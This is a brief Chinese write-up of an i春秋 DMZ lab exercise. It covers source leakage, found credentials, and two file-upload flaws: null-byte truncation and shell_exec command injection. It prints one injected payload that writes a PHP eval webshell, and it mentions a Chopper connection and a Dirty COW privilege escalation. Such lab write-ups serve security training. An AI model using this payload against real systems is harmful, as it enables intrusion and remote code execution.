i春秋DMZ大型靶场实验(三)内网转发DMZ2

 

更具实验文件知道存在源码泄露  下载源码进行源码审计php

发现admin帐号html

查看user.php 发现mysql 帐号 端口mysql

对登陆后源码进行审计 发现上传文件的两处漏洞sql

对 fiel name 能够 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 能够拼接执行 命令 写一句话 例如 shell

'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'htm

 

菜刀链接blog

 上传脏牛提权源码

相关文章
相关标签/搜索